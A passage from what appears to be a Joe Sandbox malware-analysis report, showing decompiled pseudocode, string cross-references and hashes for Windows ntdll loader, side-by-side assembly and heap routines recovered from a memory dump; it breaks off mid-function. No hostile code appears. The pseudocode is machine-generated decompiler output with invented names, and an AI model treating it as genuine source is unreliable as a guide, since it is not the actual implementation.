Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 97e910e5a7baff74774915ffb11c69639f28e0c037134b06c10fd54c00357a79
Instruction ID: f903a730156d4418655e00e6fcebc457df0c37be04663966def3b2771d0e6760
Opcode Fuzzy Hash: 97e910e5a7baff74774915ffb11c69639f28e0c037134b06c10fd54c00357a79
Instruction Fuzzy Hash: 7751F2B1708301AFE720DF24D865BAB77EAFB84708F044969F58597291E630FD04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 04CEC5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04CEC5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x4dab370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x4da37c0 & 0x00000005;
					if(( *0x4da37c0 & 0x00000005) != 0) {
						E04D2E692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E04CF8F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = E04CA6B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E04CDE7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E04D34348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E04CD19DF(0);
							E04CD2755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E04CD1934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E04CD270D(_t68);
							E04CE79F9();
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E04D305C6(_v100, _t68);
								 *0x4da5c9c = _v100;
							}
						} else {
							_t52 =  *0x4da37c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E04D2E692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x4da37c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return E04CF4B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x04cec5ce
0x04cec5d8
0x04cec5ea
0x04cec5f0
0x04cec5f5
0x04d27f71
0x04d27f78
0x04d27f91
0x04d27f96
0x04d27f96
0x04d27fa1
0x04d27fa6
0x04d27fad
0x04d27fb1
0x04d27fbe
0x04d27fc0
0x04d27fc4
0x04d27fca
0x04d27fca
0x04d27fcf
0x04d27fd1
0x04d27fe0
0x04d27fe2
0x04d27fe4
0x04d28022
0x04d28027
0x04d28037
0x04d2803b
0x04d2803e
0x04d28043
0x04d28044
0x04d28046
0x04d28049
0x04d2804a
0x04d2804f
0x04d28054
0x04d28056
0x04d28068
0x04d28075
0x04d2807d
0x04d28086
0x04d28086
0x04d27fe6
0x04d27fe6
0x04d27feb
0x04d27fed
0x04d28005
0x04d2800a
0x04d2800f
0x04d2800f
0x04d28012
0x04d28014
0x04d2801a
0x04d2801a
0x04d28014
0x04d27fe4
0x04d27fd1
0x04cec601
0x04cec602
0x04cec603
0x04cec60e

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 04D27FF0
minkernel\ntdll\ldrinit.c, xrefs: 04CEC5E3
LdrpInitializeImportRedirection, xrefs: 04D27F82, 04D27FF6
LdrpInitializeProcess, xrefs: 04CEC5E4
minkernel\ntdll\ldrredirect.c, xrefs: 04D27F8C, 04D28000
Loading import redirection DLL: '%wZ', xrefs: 04D27F7B

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 400a5368ba0e83856fde43af65f329f767bf790e7e01de78f1f359c3a9b48326
Instruction ID: 7e83eae8f466a4c2f9bea01d14582910466c0b9b9aebdf216548968f47058a78
Opcode Fuzzy Hash: 400a5368ba0e83856fde43af65f329f767bf790e7e01de78f1f359c3a9b48326
Instruction Fuzzy Hash: 2E310771705341AFD324EF28D95AE2AB7D6EF98B18F050568F9845B391D720FC04DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04CE2594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x4c8120c) {
					E04D3EF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E04CE2C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E04D3EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E04CE265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E04D3EF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E04CE2919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E04D3EF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x04ce2594
0x04ce2594
0x04ce259c
0x04ce25a6
0x04ce25a9
0x04ce25ac
0x04ce25b6
0x04d21f77
0x00000000
0x04ce25bc
0x04ce25bc
0x04ce25c1
0x04ce25c3
0x04ce25c3
0x04ce25c5
0x04ce25ce
0x04d21fbc
0x04d21fc1
0x04d21fc2
0x04d21fc3
0x04d21fd1
0x00000000
0x04ce25e5
0x04ce25fc
0x04ce2600
0x04d21f81
0x04d21f82
0x00000000
0x04ce2606
0x04ce2606
0x04ce260b
0x04ce264a
0x04ce264a
0x04ce260d
0x04ce260d
0x04ce2612
0x04ce2655
0x04ce2655
0x04ce2614
0x04ce2614
0x04ce2619
0x00000000
0x04ce261b
0x04ce261e
0x04d21fa0
0x04d21fa3
0x04d21fb2
0x04d21fd9
0x04d21fd9
0x04ce2624
0x04ce262e
0x04ce2632
0x04d21f89
0x04d21f8a
0x04d21f8f
0x04d21f8f
0x04d21f91
0x04d21f93
0x04ce2638
0x04ce263e
0x04ce2643
0x00000000
0x04ce2645
0x04ce2648
0x00000000
0x04ce2648
0x04ce2643
0x04ce2632
0x04ce261e
0x04ce2619
0x04ce2612
0x04ce260b
0x04ce2600
0x04ce25ce
0x04ce2652

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 04D21F8A
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 04D21FC9
SXS: %s() passed the empty activation context, xrefs: 04D21F6F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 04D21F82
RtlGetAssemblyStorageRoot, xrefs: 04D21F6A, 04D21FA4, 04D21FC4
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 04D21FA9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 6f00414e8d0f1235f012c8d9ea807580f7ea30a6fa828c33bf9719e01ffc95fe
Instruction ID: 33e0973a0d6646504597ad4637a972d4fc2552a0e0d336fcbcfb9c224645feeb
Opcode Fuzzy Hash: 6f00414e8d0f1235f012c8d9ea807580f7ea30a6fa828c33bf9719e01ffc95fe
Instruction Fuzzy Hash: 7731E973B41224BBEB209A878C45F6F77ADEB54B58F0545AAF910B7244D370FE01CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 04CC6FE0 Relevance: 6.0, Strings: 3, Instructions: 2248
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04CC6FE0(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed short _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed short _v48;
				char _v49;
				signed int _v56;
				char _v57;
				char _v58;
				signed char _v59;
				char _v60;
				char _v61;
				signed int _v68;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed short _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				signed short _v110;
				char _v111;
				signed int _v116;
				signed int _v120;
				signed char _v124;
				signed int _v128;
				signed short _v130;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed int _v140;
				signed short _v144;
				signed short _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				short* _v172;
				signed int _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed short _v196;
				unsigned int* _v200;
				intOrPtr _v204;
				signed int _v208;
				signed short _v212;
				signed int _v216;
				signed int _v220;
				signed char _v224;
				unsigned int* _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				char _v256;
				intOrPtr _v260;
				signed int* _v264;
				signed int _v268;
				intOrPtr _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed short _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed short _v340;
				signed short _v348;
				signed int _v356;
				signed short _v364;
				signed short _v372;
				signed short _v380;
				signed short _v388;
				signed short _v396;
				signed short _v404;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t980;
				signed int _t985;
				char* _t988;
				signed int _t994;
				signed int _t998;
				signed int _t1004;
				signed char* _t1005;
				signed int _t1006;
				signed char* _t1007;
				signed int _t1008;
				signed char* _t1009;
				signed int _t1011;
				intOrPtr _t1012;
				signed int _t1026;
				signed char* _t1027;
				intOrPtr _t1036;
				signed int _t1037;
				signed char* _t1038;
				intOrPtr _t1047;
				signed int _t1052;
				signed int _t1053;
				intOrPtr _t1055;
				signed short* _t1056;
				signed int* _t1059;
				unsigned int* _t1066;
				signed int _t1069;
				signed int _t1071;
				signed int _t1073;
				signed short _t1075;
				void* _t1076;
				signed short _t1079;
				signed int _t1081;
				signed short _t1083;
				signed int* _t1085;
				signed char* _t1088;
				signed int _t1090;
				signed int _t1101;
				intOrPtr* _t1102;
				signed int _t1104;
				signed int _t1108;
				signed int _t1118;
				unsigned int _t1125;
				signed int _t1134;
				signed char _t1135;
				signed short _t1143;
				signed char _t1147;
				signed short _t1148;
				void* _t1149;
				signed short _t1154;
				signed int _t1157;
				intOrPtr* _t1163;
				intOrPtr* _t1164;
				signed int _t1171;
				signed int _t1172;
				intOrPtr* _t1180;
				intOrPtr* _t1181;
				signed int _t1184;
				signed int _t1189;
				signed short _t1191;
				intOrPtr _t1197;
				signed int _t1202;
				signed int _t1205;
				signed int _t1208;
				intOrPtr* _t1216;
				signed int _t1219;
				signed int* _t1226;
				signed int* _t1227;
				signed int _t1230;
				signed int _t1231;
				signed int _t1237;
				signed short* _t1241;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed short* _t1253;
				signed short* _t1257;
				signed int _t1263;
				signed int _t1265;
				signed short _t1266;
				signed int _t1269;
				signed int _t1271;
				signed int _t1274;
				signed short _t1302;
				signed short _t1306;
				intOrPtr _t1312;
				signed int _t1316;
				signed int _t1321;
				signed int _t1327;
				signed int _t1328;
				signed int _t1332;
				signed short* _t1334;
				signed short _t1336;
				signed int* _t1337;
				signed int _t1349;
				signed int _t1356;
				signed short _t1378;
				void* _t1379;
				signed short _t1384;
				signed int _t1385;
				signed int _t1389;
				intOrPtr* _t1391;
				signed short _t1393;
				signed int* _t1394;
				signed int _t1406;
				signed int _t1413;
				intOrPtr* _t1417;
				signed char _t1419;
				signed int _t1421;
				signed int _t1423;
				char _t1429;
				void* _t1436;
				signed int _t1440;
				signed int _t1441;
				signed short _t1443;
				signed int _t1444;
				unsigned int _t1447;
				signed int _t1449;
				signed short _t1450;
				signed int _t1452;
				signed short _t1454;
				signed short _t1455;
				signed char _t1464;
				signed int _t1469;
				unsigned int _t1472;
				intOrPtr* _t1473;
				signed int _t1482;
				signed int _t1484;
				signed int _t1486;
				signed int _t1487;
				signed short _t1495;
				intOrPtr _t1496;
				signed short _t1498;
				signed char _t1499;
				signed int _t1500;
				signed short* _t1501;
				signed int _t1502;
				signed short* _t1505;
				signed char* _t1510;
				signed char _t1513;
				intOrPtr _t1517;
				signed int* _t1518;
				signed char _t1519;
				signed int _t1520;
				signed short _t1521;
				intOrPtr _t1522;
				signed short _t1524;
				signed int _t1526;
				intOrPtr* _t1528;
				signed int _t1530;
				intOrPtr* _t1533;
				signed char _t1536;
				intOrPtr _t1537;
				intOrPtr _t1542;
				signed char _t1548;
				intOrPtr* _t1550;
				signed int _t1553;
				signed int _t1555;
				intOrPtr _t1564;
				intOrPtr _t1565;
				signed int _t1567;
				signed int _t1569;
				signed int _t1570;
				unsigned int _t1573;
				signed int _t1576;
				signed int _t1578;
				intOrPtr _t1599;
				signed int _t1605;
				signed short _t1608;
				void* _t1609;
				signed int _t1611;
				signed short _t1612;
				signed short _t1635;
				intOrPtr _t1636;
				signed short _t1638;
				signed short _t1641;
				signed int _t1643;
				signed int _t1646;
				signed int _t1653;
				unsigned int _t1661;
				signed int _t1662;
				intOrPtr _t1667;
				signed int _t1670;
				signed int _t1672;
				signed int _t1674;
				signed int _t1677;
				signed short _t1679;
				signed int _t1680;
				signed short* _t1688;
				signed int _t1690;
				signed short _t1691;
				intOrPtr _t1693;
				signed int _t1695;
				signed short _t1696;
				intOrPtr _t1698;
				signed short _t1700;
				unsigned int _t1705;
				signed int _t1708;
				intOrPtr _t1709;
				signed short _t1711;
				signed int _t1712;
				signed int _t1714;
				signed int _t1715;
				signed short _t1719;
				signed int _t1721;
				signed short _t1723;
				signed short _t1724;
				signed short _t1725;
				signed int _t1727;
				signed int _t1729;
				signed short _t1730;
				signed int _t1738;
				intOrPtr _t1739;
				signed short _t1743;
				unsigned int _t1745;
				signed int _t1757;
				signed char _t1767;
				signed int _t1768;
				signed char _t1771;
				signed int _t1774;
				signed short _t1775;
				signed int _t1777;
				signed short _t1778;
				signed int _t1784;
				unsigned int _t1789;
				signed int _t1790;
				signed int _t1791;
				intOrPtr* _t1792;
				signed int _t1793;
				signed int* _t1794;
				signed short* _t1795;
				signed int _t1796;
				signed short* _t1797;
				signed int* _t1798;
				short* _t1799;
				intOrPtr _t1800;
				signed int _t1801;
				signed short* _t1802;
				intOrPtr _t1803;
				signed int _t1804;
				intOrPtr* _t1805;
				intOrPtr* _t1806;
				signed int _t1807;
				signed int _t1808;
				void* _t1809;
				intOrPtr _t1810;
				signed int _t1812;
				unsigned int _t1814;
				unsigned int* _t1816;
				signed int _t1817;
				signed int _t1818;
				signed int _t1819;
				signed int _t1820;
				signed int* _t1821;
				signed int _t1822;
				signed int _t1825;
				signed int _t1826;
				intOrPtr _t1827;
				signed int _t1828;
				signed int* _t1829;
				signed int _t1830;
				signed int* _t1833;
				intOrPtr _t1834;
				signed int _t1837;
				void* _t1838;
				void* _t1839;
				void* _t1842;
				void* _t1843;
				void* _t1853;

				_t1658 = __edx;
				_t1460 = __ecx;
				_push(0xfffffffe);
				_push(0x4d8c1c8);
				_push(E04CFAD20);
				_push( *[fs:0x0]);
				_t1839 = _t1838 - 0x180;
				_t980 =  *0x4dab370;
				_v12 = _v12 ^ _t980;
				_push(_t980 ^ _t1837);
				 *[fs:0x0] =  &_v20;
				_t1440 = __edx;
				_v120 = __edx;
				_t1771 = __ecx;
				_v124 = __ecx;
				_v140 = 0;
				_v116 = 1;
				_v49 = 0;
				_v88 = 0;
				_v68 = 0;
				_v152 = 0;
				_t1784 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v116 = 0;
					 *_a16 = 4;
					_t985 = _a4;
					__eflags = _t985 - 0x7fffffff;
					if(_t985 <= 0x7fffffff) {
						__eflags = _t1440 & 0x61000000;
						if((_t1440 & 0x61000000) == 0) {
							L10:
							__eflags = _t985;
							if(_t985 == 0) {
								_t985 = 1;
							}
							_t1661 =  *((intOrPtr*)(_t1771 + 0x94)) + _t985 &  *(_t1771 + 0x98);
							__eflags = _t1661 - 0x10;
							if(_t1661 < 0x10) {
								_t1661 = 0x10;
							}
							_a8 = _t1661;
							_t1464 = _t1440 >> 0x00000004 & 0xffffffe1 | 0x00000001;
							_v56 = _t1464;
							__eflags = _t1440 & 0x3c000100;
							if((_t1440 & 0x3c000100) != 0) {
								L16:
								_t1464 = _t1464 | 0x00000002;
								_v56 = _t1464;
								_t1661 = _t1661 + 8;
								__eflags = _t1661;
								_a8 = _t1661;
							} else {
								__eflags =  *(_t1771 + 0xbc);
								if( *(_t1771 + 0xbc) != 0) {
									goto L16;
								}
							}
							_t1662 = _t1661 >> 3;
							__eflags = _t1662;
							_v40 = _t1662;
							goto L18;
						} else {
							__eflags = _t1440 & 0x10000000;
							if(__eflags != 0) {
								goto L10;
							} else {
								_t1436 = E04D5F0A5(_t1440, _t1460, _t1658, _t1771, _t1784, __eflags, _t985);
								 *[fs:0x0] = _v20;
								return _t1436;
							}
						}
					} else {
						__eflags = 0;
						 *[fs:0x0] = _v20;
						return 0;
					}
				} else {
					_t1464 = 1;
					_v56 = 1;
					_t1662 = _t1784;
					_v40 = _t1662;
					if(_t1662 < 2) {
						_a8 = _a8 + 8;
						_t1662 = 2;
						_v40 = 2;
					}
					 *_a16 = 3;
					L18:
					_t1441 = _t1440 & 0x00800000;
					if(_t1441 != 0 && ( *( *[fs:0x30] + 0x68) & 0x00000800) == 0) {
						_t1464 = _t1464 | 0x00000008;
						_v56 = _t1464;
					}
					_v8 = 0;
					_t1851 = _v120 & 0x00000001;
					if((_v120 & 0x00000001) != 0) {
						L30:
						__eflags = _t1662 -  *((intOrPtr*)(_t1771 + 0x5c));
						if(_t1662 >  *((intOrPtr*)(_t1771 + 0x5c))) {
							__eflags =  *(_t1771 + 0x40) & 0x00000002;
							if(( *(_t1771 + 0x40) & 0x00000002) == 0) {
								_v180 = 0xc0000023;
								goto L516;
							} else {
								_t1789 = _a8 + 0x18;
								_a8 = _t1789;
								_a8 = _t1789;
								_t898 = _t1789 + 0xfff; // 0xfe7
								_t1469 = _t898 & 0xfffff000;
								_t994 = E04CE68EA( *((intOrPtr*)(_t1771 + 0x1f8)) -  *((intOrPtr*)(_t1771 + 0x244)), _t1771, _t1771 + 0xd4);
								__eflags = _t994;
								if(_t994 != 0) {
									_v328 = (E04CB2330(_t1469) & 0x0000000f) << 0xc;
									_t1666 =  &_a8;
									_t998 = E04D07948(_t1771,  &_a8, (E04CB2330(_t1469) & 0x0000000f) << 0xc,  &_v256);
									_t1790 = _t998;
									_v68 = _t1790;
									__eflags = _t1790;
									if(_t1790 != 0) {
										_t1791 = _v68;
										_t1472 = _a8;
										 *(_t1791 + 0x18) = _t1472 - _a4;
										 *(_t1791 + 0x1a) = _v56 | 0x00000002;
										 *(_t1791 + 0x10) = _t1472;
										 *((intOrPtr*)(_t1791 + 0x14)) = _v256;
										 *((char*)(_t1791 + 0x1f)) = 4;
										 *((intOrPtr*)(_t1771 + 0x200)) =  *((intOrPtr*)(_t1771 + 0x200)) + _t1472;
										_t1004 = E04CC3C40();
										__eflags = _t1004;
										if(_t1004 == 0) {
											_t1005 = 0x7ffe0380;
										} else {
											_t1005 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1005;
										if( *_t1005 != 0) {
											_t1047 =  *[fs:0x30];
											__eflags =  *(_t1047 + 0x240) & 0x00000001;
											if(( *(_t1047 + 0x240) & 0x00000001) != 0) {
												_t1666 = _v68;
												E04D6EFD3(_t1441, _t1771, _v68, _a8, 9);
											}
										}
										_t1006 = E04CC3C40();
										__eflags = _t1006;
										if(_t1006 == 0) {
											_t1007 = 0x7ffe0380;
										} else {
											_t1007 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										__eflags =  *_t1007;
										if( *_t1007 != 0) {
											_t1036 =  *[fs:0x30];
											__eflags =  *(_t1036 + 0x240) & 0x00000001;
											if(( *(_t1036 + 0x240) & 0x00000001) != 0) {
												_t1037 = E04CC3C40();
												__eflags = _t1037;
												if(_t1037 == 0) {
													_t1038 = 0x7ffe0380;
												} else {
													_t1038 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
												}
												__eflags =  *(_t1771 + 0x74) << 3;
												_t1666 = _v68;
												E04D6F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1038 & 0x000000ff);
											}
										}
										_t1008 = E04CC3C40();
										__eflags = _t1008;
										if(_t1008 == 0) {
											_t1009 = 0x7ffe038a;
										} else {
											_t1009 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										}
										__eflags =  *_t1009;
										if( *_t1009 != 0) {
											_t1026 = E04CC3C40();
											__eflags = _t1026;
											if(_t1026 == 0) {
												_t1027 = 0x7ffe038a;
											} else {
												_t1027 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
											}
											__eflags =  *(_t1771 + 0x74) << 3;
											_t1666 = _v68;
											E04D6F1C3(_t1441, _t1771, _v68,  *(_t1771 + 0x74) << 3, _a8,  *(_t1771 + 0x74) << 3,  *_t1027 & 0x000000ff);
										}
										__eflags =  *(_t1771 + 0x40) & 0x08000000;
										if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
											 *((short*)(_v68 + 8)) = E04CDFDB9(1, _t1666);
										}
										_t1011 =  *( *[fs:0x30] + 0x68);
										_v332 = _t1011;
										__eflags = _t1011 & 0x00000800;
										if((_t1011 & 0x00000800) != 0) {
											__eflags = _v120 >> 0x12;
											 *((short*)(_v68 + 0xa)) = E04D59AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *(_t1791 + 0x10) >> 3, 1);
										}
										__eflags =  *(_t1771 + 0x4c);
										if( *(_t1771 + 0x4c) != 0) {
											 *(_t1791 + 0x1b) =  *(_t1791 + 0x1a) ^  *(_t1791 + 0x19) ^  *(_t1791 + 0x18);
											_t960 = _t1791 + 0x18;
											 *_t960 =  *(_t1791 + 0x18) ^  *(_t1771 + 0x50);
											__eflags =  *_t960;
										}
										_t1012 = _t1771 + 0x9c;
										_t1473 =  *((intOrPtr*)(_t1012 + 4));
										_t1667 =  *_t1473;
										__eflags = _t1667 - _t1012;
										if(_t1667 != _t1012) {
											__eflags = 0;
											E04D75FED(0xd, 0, _t1012, 0, _t1667, 0);
										} else {
											_t1792 = _v68;
											 *_t1792 = _t1012;
											 *((intOrPtr*)(_t1792 + 4)) = _t1473;
											 *_t1473 = _t1792;
											 *((intOrPtr*)(_t1012 + 4)) = _t1792;
										}
										_v88 = _v68 + 0x20;
									} else {
										_v88 = _t998;
										 *((intOrPtr*)(_t1771 + 0x224)) =  *((intOrPtr*)(_t1771 + 0x224)) + 1;
									}
								} else {
									_v180 = 0xc000012d;
									goto L516;
								}
							}
						} else {
							__eflags = _t1441;
							if(_t1441 == 0) {
								__eflags = _t1784 - ( *(_t1771 + 0xf0) & 0x0000ffff);
								_t1413 = _a4;
								if(_t1784 < ( *(_t1771 + 0xf0) & 0x0000ffff)) {
									__eflags = _t1413 -  *0x4da3928; // 0x4000
									if(__eflags <= 0) {
										_t1417 = (_t1784 >> 3) + 0xf2 + _t1771;
										_v72 = _t1417;
										_t1767 =  *_t1417;
										_t1464 = _t1784 & 0x00000007;
										_t1419 = 1 << _t1464;
										__eflags = _t1767 & _t1419;
										if((_t1767 & _t1419) == 0) {
											_t1833 =  *((intOrPtr*)(_t1771 + 0xec)) + _t1784 * 2;
											_v264 = _t1833;
											 *_t1833 =  *_t1833 + 0x21;
											_t1464 =  *_t1833;
											__eflags = _v152;
											if(_v152 != 0) {
												L45:
												_t1421 = _a4;
												__eflags = _t1421;
												_t1768 = _t1421;
												if(_t1421 == 0) {
													_t1768 = 1;
												}
												__eflags =  *((char*)(_t1771 + 0xea)) - 2;
												if( *((char*)(_t1771 + 0xea)) != 2) {
													_t1653 = 0;
													__eflags = 0;
												} else {
													_t1653 =  *(_t1771 + 0xe4);
												}
												_t1423 = E04CAE2AA(_t1653, _t1768) & 0x0000ffff;
												_t1464 = 0xffff;
												__eflags = _t1423 - 0xffff;
												if(_t1423 == 0xffff) {
													__eflags =  *((char*)(_t1771 + 0xea)) - 2;
													if( *((char*)(_t1771 + 0xea)) != 2) {
														L54:
														_t90 = _t1771 + 0x48;
														 *_t90 =  *(_t1771 + 0x48) | 0x20000000;
														__eflags =  *_t90;
													} else {
														__eflags =  *(_t1771 + 0xe4);
														if( *(_t1771 + 0xe4) == 0) {
															goto L54;
														}
													}
												} else {
